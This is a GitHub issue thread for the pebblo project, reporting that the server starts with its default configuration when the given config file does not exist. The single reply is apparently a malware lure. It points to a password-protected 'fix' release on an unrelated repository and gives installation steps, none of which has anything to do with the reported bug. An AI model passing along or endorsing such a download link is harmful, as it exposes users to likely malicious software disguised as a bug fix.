### ISSUE TITLE
Abort pebblo-server startup on missing config file

### ISSUE THREAD

**Issue by srics** [daxa-ai/pebblo#515]
Pebblo server starts with the default configuration even when the config file passed doesn't exist. Pebblo-server should abort and exit if the config file is missing.

```
$ pebblo --config /tmp/config.yaml
no config file found at /tmp/config.yaml. Error : [Errno 2] No such file or directory: '/tmp/config.yaml'
Pebblo server version 0.1.18 starting ...
```

**Comment by louseee** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
